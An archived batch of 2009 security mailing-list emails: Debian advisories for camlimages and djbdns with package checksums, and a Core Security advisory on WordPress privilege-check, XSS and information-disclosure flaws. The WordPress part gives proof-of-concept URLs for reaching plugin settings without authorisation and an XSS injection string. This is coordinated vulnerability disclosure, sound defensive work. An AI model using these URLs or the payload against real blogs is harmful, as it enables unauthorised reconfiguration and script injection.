  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_alpha.deb
    Size/MD5 checksum:    32208 42eb3769e659ddbfdffd9b960412d603
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_alpha.deb
    Size/MD5 checksum:   543084 4c1659b52e35ee819bbca24f917824cd

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_amd64.deb
    Size/MD5 checksum:    31364 6d98eeb479c628858e0bc991637022e5
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_amd64.deb
    Size/MD5 checksum:   978144 c1977ebd20027e74de2f6f297da05e0d

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_arm.deb
    Size/MD5 checksum:    28838 4ceaec79b0cdde93f51e5b49bf61fa05
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_arm.deb
    Size/MD5 checksum:   559286 2801a414b3c5e9002dd40f406dcc4b37

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_armel.deb
    Size/MD5 checksum:    29658 594886fe8311b54fccb61eaee44a3c02
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_armel.deb
    Size/MD5 checksum:   571664 45911009fdefb1ea30130bd33d31c35a

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_hppa.deb
    Size/MD5 checksum:   588132 a95c95d82148d7b8b91c836a68ac7385
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_hppa.deb
    Size/MD5 checksum:    32858 1dee58411cfe4a51329df8592dd52a53

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_i386.deb
    Size/MD5 checksum:    27722 dbda0c3362977d516c9b9799a052f330
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_i386.deb
    Size/MD5 checksum:   953866 eebdf69c111869e266fe0d273ffc2f21

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_ia64.deb
    Size/MD5 checksum:   545784 c15dfebf6974c23db3058cccb3d74a97
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_ia64.deb
    Size/MD5 checksum:    39612 126b5b4e7eb783fb3323ff30d38a9468

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_mips.deb
    Size/MD5 checksum:   569842 5255f663cb728e93f56bfafc3b5953aa
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_mips.deb
    Size/MD5 checksum:    28610 f2b8a4aa2d67d0e59679534b5cbcb93d

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_mipsel.deb
    Size/MD5 checksum:   515800 5aba5d1ce2e2ae5d927f111f89eed5c6
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_mipsel.deb
    Size/MD5 checksum:    28368 9ec52520ff65438150dfafb89ed3fc0a

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_powerpc.deb
    Size/MD5 checksum:   987998 c9a1362f01e353424e0c028c25dc4d69
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_powerpc.deb
    Size/MD5 checksum:    38676 8317d63a699feeb5bfa7f829f28409b8

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml-dev_2.2.0-4+lenny1_sparc.deb
    Size/MD5 checksum:   957764 5602e2c367324be5ca5137b8c23cb0ad
  http://security.debian.org/pool/updates/main/c/camlimages/libcamlimages-ocaml_2.2.0-4+lenny1_sparc.deb
    Size/MD5 checksum:    27712 c2c4c2397004024c440721709a45d4cb


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJKW5duAAoJECIIoQCMVaAcNOQH/2kCBktuB4Mv8rSFIpw6K0cO
W7Rp8n8gc5JqOLm1RoD8cDrAup5yNHJSfKb+4ier35LFnKc/jKzihrbW1Hz409V0
AJ1Mdj7p7DG8wArp/5GrT/hcwLuaywUigaYw0SaQqiVorC96K9jgkyTWhqxnyHaH
MSL7zM5+q9EnrNQvLR+PLP6QIj7m7Ufi3/JtJtBp1tjdxioUccwr5Lw2VFurRQje
l0zegT7x4HTmOC1KSpZG/VA+qW31iSvxO11PWOHyYRGn0V8NY0ra8KJCicncBT+f
QInW9hEnZtZFMoLzJdQ3bizSGyaKawHyCkDcrSaeTgNflPJVZ+9vrGWkMbM6qNc=srad
-----END PGP SIGNATURE-----

From - Mon Jul 13 17:54:07 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008c79
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40838-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6E187EC0F6
for <lists@securityspace.com>; Mon, 13 Jul 2009 17:31:22 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id B970414373A; Mon, 13 Jul 2009 15:08:12 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23530 invoked from network); 13 Jul 2009 20:11:12 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@loeki.tv>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Flag: NO
X-Spam-Score: -9.58
X-Spam-Level: 
X-Spam-Status: No, score=-9.58 tagged_above=-10000 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
autolearn=ham
From: Thijs Kinkhorst <thijs@debian.org>
Message-Id: <20090713201150.5B06F326983@morgana.loeki.tv>
Date: Mon, 13 Jul 2009 22:11:50 +0200 (CEST)
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1831-1] New djbdns packages fix privilege escalation
Priority: urgent
Resent-Message-ID: <Nl0svz-HP2K.A.cHD.OU5WKB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 13 Jul 2009 20:11:58 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1831-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
July 13, 2009                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : djbdns
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0858
Debian Bug     : 518169

Matthew Dempsky discovered that Daniel J. Bernstein's djbdns, a Domain
Name System server, does not constrain offsets in the required manner,
which allows remote attackers with control over a third-party subdomain
served by tinydns and axfrdns, to trigger DNS responses containing
arbitrary records via crafted zone data for this subdomain.

The old stable distribution (etch) does not contain djbdns.

For the stable distribution (lenny), this problem has been fixed in
version 1.05-4+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 1.05-5.

We recommend that you upgrade your djbdns package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05.orig.tar.gz
    Size/MD5 checksum:    85648 3147c5cd56832aa3b41955c7a51cbeb2
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1.dsc
    Size/MD5 checksum:     1237 b7dc377faa3cc915a4fc4c831188c536
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1.diff.gz
    Size/MD5 checksum:    52796 aa741f98a1c7d7b64f49b3ec3d69646d

Architecture independent packages:

  http://security.debian.org/pool/updates/main/d/djbdns/dnscache-run_1.05-4+lenny1_all.deb
    Size/MD5 checksum:    11892 0f09b110a5a7ea7090dfc315a8a07195

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_alpha.deb
    Size/MD5 checksum:   376022 3830f80ce21a48e88b7e0c633e49dceb
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_alpha.deb
    Size/MD5 checksum:   468272 b0a4798d65577dd53467643d000399b6

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_amd64.deb
    Size/MD5 checksum:   350360 4ba6658eb89e6c077bc65d890171cc72
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_amd64.deb
    Size/MD5 checksum:   280924 db6e0cf1d36bd78ddca6c5d8529cceb0

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_arm.deb
    Size/MD5 checksum:   250172 d10532c10a8b1a97a4a80eb9fc13df4a
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_arm.deb
    Size/MD5 checksum:   225608 341f7d38f134999384529eeb198086a5

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_armel.deb
    Size/MD5 checksum:   298760 02d7ec2dd3de0f7f7f1953c2598bb66d
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_armel.deb
    Size/MD5 checksum:   250440 6a510480fb22b97faf94dfbb7d5abccf

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_hppa.deb
    Size/MD5 checksum:   365562 40bc21efebeb6e848484cbfcaac87e72
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_hppa.deb
    Size/MD5 checksum:   303522 884370529609702ecc4dc362953210db

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_i386.deb
    Size/MD5 checksum:   269360 cb87c5c2b60dbb6e2bc30b6e47ea5beb
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_i386.deb
    Size/MD5 checksum:   237334 ea0f66d842ce13a6a989efb387745813

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_ia64.deb
    Size/MD5 checksum:   495368 fd6574844346c01adc85bb2f64f09009
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_ia64.deb
    Size/MD5 checksum:   584748 dc2f804743edc82eacfd3a5a644ae77a

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_mips.deb
    Size/MD5 checksum:   364272 c4da4293a29d8d499aa3b22ddbce4fd1
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_mips.deb
    Size/MD5 checksum:   447956 53db6801f7cae6324296f1f47eb0b86c

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_mipsel.deb
    Size/MD5 checksum:   363136 2a77e576d2bd8129659a0abe4944b877
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_mipsel.deb
    Size/MD5 checksum:   446700 2bafbc1dc76d470484ab108e92b7dae2

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_powerpc.deb
    Size/MD5 checksum:   270750 3ee59ee9320d6a205c4a8decaa40f542
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_powerpc.deb
    Size/MD5 checksum:   332636 629f4decc315ac55e7a2704de4755358

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_s390.deb
    Size/MD5 checksum:   265986 2148a2f1d5f12fc444f76414a632aaea
  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_s390.deb
    Size/MD5 checksum:   324762 5c616a1fccaf633ecb77f145b6c4f648

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/d/djbdns/dbndns_1.05-4+lenny1_sparc.deb
    Size/MD5 checksum:   289234 030ded000454623b720d589eaf5db8bc
  http://security.debian.org/pool/updates/main/d/djbdns/djbdns_1.05-4+lenny1_sparc.deb
    Size/MD5 checksum:   252888 18fd0b54b12a8d65a9aeb41b11b78e85


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJKW5QgAAoJECIIoQCMVaAcwfQH/1ZZCH0SVcFecp+0FPq8KDOH
+Ug7s4Voup4P5FS7bTTctr+UNC/beS2SPM8uJtCSvCAB04umEWVsmUmk5l+s9LVL
6XwWNP+UGoGz86CMI9gxQ3+UKqfJ/Magz018t0eP5BlLacIr5L7NoFc4uUJ15rE3
fHJb+6bi3Z6fjxnXr80D1Zgl6WRxDNnl0QOL5ny/R+8nrmqVN0Ojp2kvQnyID8gz
ZwHgOG5I6XJs2SSm2K57QN5vmC1LfNqkh4tf54+aULmHNJoE+eyX7hH1vRYPpwxE
7HMTkxP19zCIxAA5RW8hTxNbfLtUVFbbrH88T9RUt66eGLTW9BRGYAdBki/gTGA=hPtm
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:25 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b62
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40809-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0BCF1ECF93
for <lists@securityspace.com>; Wed,  8 Jul 2009 18:43:47 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3D2AA236F81; Wed,  8 Jul 2009 16:38:36 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24344 invoked from network); 8 Jul 2009 22:32:55 -0000
Message-ID: <4A551EE0.3010303@coresecurity.com>
Date: Wed, 08 Jul 2009 19:34:08 -0300
From: Core Security Technologies Advisories <advisories@coresecurity.com>
Reply-To: advisories@coresecurity.com
Organization: Core Security Technologies
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and
 Multiple Information
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status: RO

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

WordPress Privileges Unchecked in admin.php and Multiple Information
Disclosures



1. *Advisory Information*

Title: WordPress Privileges Unchecked in admin.php and Multiple
Information Disclosures
Advisory ID: CORE-2009-0515
Advisory URL:
http://corelabs.coresecurity.com/index.php?action=view&typevisory&name=WordPress_Privileges_Unchecked
Date published: 2009-07-08
Date of last update: 2009-07-08
Vendors contacted: WordPress
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Local file include, Privileges unchecked, Cross site scripting
(XSS), Information disclosure
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 35581, 35584
CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336


3. *Vulnerability Description*

WordPress is a web application written in PHP that allows the easy
installation of a flexible weblog on any computer connected to the
Internet. WordPress 2.7 reached more than 6 million downloads during
June 2009 [9].

A vulnerability was found in the way that WordPress handles some URL
requests. This results in unprivileged users viewing the content of
plugins configuration pages, and also in some plugins modifying plugin
options and injecting JavaScript code. Arbitrary native code may be run
by a malicious attacker if the blog administrator runs injected
JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
hosted outside 'wordpress.com', allow any person to create unprivileged
users called subscribers. Other sensitive username information
disclosures were found in WordPress.


4. *Vulnerable packages*

   . WordPress 2.8 and previous
   . WordPress MU 2.7.1 and previous, used in WordPress.com


5. *Non-vulnerable packages*

   . WordPress 2.8.1
   . WordPress MU 2.8.1, used in WordPress.com


6. *Vendor Information, Solutions and Workarounds*

Mitigation for the Privileges Unchecked vulnerability (suggested by Core
Security): this vulnerability may be mitigated by controlling access to
files inside the 'wp-admin' folder. Access can be prohibited by using
Apache access control mechanism ('.htaccess' file), see guideline for
more information [11].


7. *Credits*

These vulnerabilities were discovered and researched by Fernando
Arnaboldi and Jos Orlicki from Core Security Technologies. Further
research was made by Jose Orlicki from Core Security Technologies.


8. *Technical Description / Proof of Concept Code*


8.1. *Introduction*

In the last few years several security bugs were found in WordPress
[1][2]. During 2008, the big amount of bugs reported by researchers lead
to exploitation by blog spammers [3]. During 2009, a new round of
attacks has appeared and security researchers are reporting new bugs or
wrongly fixed previously-reported bugs [4][5]. A path traversal in local
files included by 'admin.php' has been fixed [6][7] but, in our case, we
report that administrative privileges are still unchecked when accessing
any PHP file inside a plugin folder.


8.2. *Access Control Roles*

WordPress has a privilege model where any user has an assigned role [8].
Regarding plugins only users characterized by the role Administrator can
activate plugins. Notice that only the blog hosting owner can add new
plugins because these must by copied inside the host filesystem. The
roles Editor, Author or Subscriber (the latter has the least privileges)
cannot activate plugins, edit plugins, update plugins nor delete plugins
installed by an Administrator. Besides that, the configuration of
specific plugins is a grey area because there is no distinguished
capability assigned [8].

Also due to cross-site scripting vulnerabilities inside plugins options
(something very common), non-administrative users reconfiguring plugins
may inject persistent JavaScript code. Possibly arbitrary native code
can be executed by the attacker if the blog administrator runs injected
JavasScript code that injects PHP code. It is important to observe that
many WordPress-powered blogs are configured to allow any blog visitor to
create a Subscriber user without confirmation from the Administrator
role inside the following URL, although by default the Administrator
role must create these new users.

/-----------

http://[some_wordpress_blog]/wp-login.php?action=register
- -----------/

 This can be modified by the administrator in 'Membership/Anyone can
register'.

/-----------

http://[some_wordpress_blog]/wp-admin/options-general.php
- -----------/




8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes
(CVE-2009-2334, BID 35581)*

No privileges are checked on WordPress plugins configuration PHP modules
using parameter 'page' when we replace 'options-general.php' with
'admin.php'. The same thing happens when replacing other modules such as
'plugins.php' with 'admin.php'. Basic information disclosure is done
this way. For example, with the following URL a user with no privileges
can see the configuration of plugin Collapsing Archives, if installed.

/-----------

http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt
- -----------/

 Instead of the following allowed URL.

/-----------

http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt
- -----------/

 Another example of this information disclosure is shown on Akismet, a
plugin shipped by default with WordPress.

/-----------

http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt
- -----------/

 All plugins we have tested are vulnerable to this kind of information
disclosure, but in many of them the PHP files accessed just crashed. On
the other hand, for example, with capability 'import', privileges are
checked inside 'admin.php':

/-----------

if ( ! current_user_can('import') )
    wp_die(__('You are not allowed to import.'));
- -----------/

 More dangerous scenarios exist, all of them can be exploited by users
with the Subscriber role, the least privileged.


8.4. *Abuse example: XSS in plugin configuration module*

If installed, *Related Ways To Take Action* is an example of a WordPress
plugin that is affected by many cross-site scripting vulnerabilities
(XSS) that can be leveraged by an attacker using the unchecked
privileges described in this advisory to inject persistent JavaScript
code. Possibly, arbitrary native code can be executed by the attacker if
the blog administrator, when he/she logs in, runs injected JavasScript
code that edits blog PHP code. The original URL for reconfiguring the
plugin can be accessed only by the Administrator role.

/-----------

http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php
- -----------/

 But replacing the PHP file with the generic 'admin.php' any blog user
can modify this configuration.

/-----------

http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php
- -----------/

 The following JavaScript injection can be entered within field *Exclude
actions by term* to exemplify this kind of abuse. When the administrator
enters the same page the injected browser code will be executed and
possibly blog PHP can be modified to run arbitrary native code.

/-----------

\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="

- -----------/

 This is the worst scenario that we found for the vulnerability.


8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*

If installed, the WordPress Security Scanner Plugin dashboard can be
viewed similarly by any user besides the administrator using the plugin
configuration page URL without modification. This dashboard includes
common default blog configuration settings that are insecure and should
be modified by the blog administrator or hosting.

/-----------

http://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php
- -----------/




8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*

If installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be
reconfigured accessed with the same vulnerability.

/-----------

http://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php
- -----------/

 This gives an attacker the possibility to disable many features of the
plugin, for example reactivate the forgotten password feature and
reactivate the XML-RPC blog interface. Also you can deny the weblog
service by configuring this plugin to be overly sensitive, blocking any
request. However the plugin cannot be totally disabled because the
essential IDS parameters 'Maximum impact to ignore bad requests' and
'Minimum impact to sanitize bad requests' are verified on the server
side of the blog and cannot be distorted to deactivate the sanitizing or
blocking features of the web IDS plugin.


8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID
35584)*

WordPress discriminates bad password from bad user logins, this reduces
the complexity of a brute force attack on WordPress blogs login
(CVE-2009-2335, BID 35584). The same user information disclosure happens
when users use the forgotten mail interface to request a new password
(CVE-2009-2336, same BID 35584). These information disclosures seem to
be previously reported [6] but the WordPress team is refusing to modify
them alleging *user convenience*.

Default installation of WordPress 2.7.1 leaks the name of the user
posting entries inside the HTML of the blog.

/-----------

  <small>June 3rd, 2009 <!-- by leakedusername --></small>
- -----------/



Also several administrative modules give to anyone the complete path
where the web application is hosted inside the server. This may simplify
or enable other malicious attacks. An example follows.

/-----------

http://[some_wordpress_blog]/wp-settings.php
- -----------/



/-----------

Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
[WP_LEAKED_PATH]\wp-settings.php on line 110
Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in
[WP_LEAKED_PATH]\wp-settings.php on line 112
Warning: require(ABSPATHwp-includes/compat.php) [function.require]:
failed to open stream:
No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246
Fatal error: require() [function.require]: Failed opening required
'ABSPATHwp-includes/compat.php'
(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in
[WP_LEAKED_PATH]\wp-settings.php on line 246

- -----------/




9. *Report Timeline*

. 2009-06-04:
Core Security Technologies notifies the WordPress team of the
vulnerabilities (security@wordpress.org) and offers a technical
description encrypted or in plain-text. Advisory is planned for
publication on June 22th.

. 2009-06-08:
Core notifies again the WordPress team of the vulnerability.

. 2009-06-10:
The WordPress team asks Core for a technical description of the
vulnerability in plain-text.

. 2009-06-11:
Technical details sent to WordPress team by Core.

. 2009-06-11:
WordPress team notifies Core that a fix was produced and is available to
Core for testing. WordPress team asserts that password and username
discrimination as well as username leakage are known and will not be
fixed because they are convenient for the users.

. 2009-06-12:
Core tells the WordPress team that the patch will be tested by Core as a
courtesy as soon as possible. It also requests confirmation that
WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to
the flaws included in the advisory draft CORE-2009-0515.

. 2009-06-12:
WordPress team confirms that WordPress 2.8 and earlier plus
WordPress.com are vulnerable to the flaws included in the advisory draft.

. 2009-06-17:
Core informs the WordPress team that the patch is only fixing one of the
four proof of concept abuses included in the advisory draft. Core
reminds the WordPress team that the advisory is scheduled to be
published on June 22th but a new schedule can be discussed.

. 2009-06-19:
Core asks for a new patched version of WordPress, if available, and
notifies the WordPress team that the publication of the advisory was
re-scheduled to June 30th.

. 2009-06-19:
WordPress team confirms they have a new patch that has the potential to
break a lot of plugins.

. 2009-06-29:
WordPress team asks for a delayance on advisory CORE-2009-0515
publication until July 6th, when WordPress MU version will be patched.

. 2009-06-29:
Core agrees to delay publication of advisory CORE-2009-0515 until July 6th.

. 2009-06-29:
Core tells the WordPress team that other administrative PHP modules can
also be rendered by non-administrative users, such as module
'admin-post.php' and 'link-parse-opml.php'.

. 2009-07-02:
WordPress team comments that 'admin.php' and 'admin-post.php' are
intentionally open and plugins can choose to hook either privileged or
unprivileged actions. They also comment that unprivileged access to
'link-parse-opml.php' is benign but having this file open is bad form.

. 2009-07-02:
Core sends the WordPress team a new draft of the advisory and comments
that there is no capability specified in Worpress documentation for
configuring plugins. Also control of actions registered by plugins is
not enforced. Core also notices that the privileges unchecked bug in
'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development
release.

. 2009-07-06:
Core requests WordPress confirmation of the release date of WordPress
2.8.1 and WordPress MU 2.8.

. 2009-07-07:
WordPress team confirms that a release candidate of WordPress 2.8.1 is
made available to users and that the advisory may be published.

. 2009-07-06:
Core requests WordPress confirmation of the release date of WordPress MU
and WordPress MU new version numbers.

. 2009-07-07:
WordPress team release WordPress 2.8.1 RC1 to its users.

. 2009-07-08:
WordPress team confirms that WordPress MU 2.8.1 will be made available
as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.

. 2009-07-08:
The advisory CORE-2009-0515 is published.



10. *References*

[1] WordPress vulnerabilities in CVE database
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
[2] SecuriTeam List of WordPress Vulnerabilities
http://www.securiteam.com/products/W/Wordpress.html
[3] WordPress Vulnerability - YBO Interactive Blog
http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/
[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1
http://wordpress.org/support/topic/280748
[5] Security breach - xkcd blog
http://blag.xkcd.com/2009/06/18/security-breach/
[6] securityvulns.com WordPress vulnerabilities digest in English
http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded
[7] CVE-2008-0196
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196
[8] WordPress Roles and Capabilities
http://codex.wordpress.org/Roles_and_Capabilities
[9] WordPress Download Counter
http://wordpress.org/download/counter/
[10] WordPress Intrusion Detection System Plugin
http://php-ids.org/2008/02/21/wpids-version-012-released/
[11] Hardening WordPress with htaccess
http://blogsecurity.net/wordpress/article-210607


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

